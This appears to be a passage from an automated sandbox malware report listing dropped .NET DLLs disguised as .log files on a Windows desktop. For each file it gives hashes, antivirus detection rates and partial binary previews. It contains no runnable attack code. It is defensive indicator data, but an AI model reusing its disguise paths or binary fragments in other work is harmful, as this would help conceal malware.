SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\EDFigHLC.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EVFwVPZl.log

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FgXXGzqG.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GJkyKHuU.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\HGMGgHJP.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IJkognUh.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\JNwXPUdL.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JTcevqgv.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LPiGkDiH.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MhOXPBbk.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\MpypukBp.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OJgNpsGn.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\OlLEhJlc.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\PetFAjEL.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RhNXkKhf.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RpfWQkOw.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\RwkTfkwc.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\TzBXQCtx.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\UHGUfCbd.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
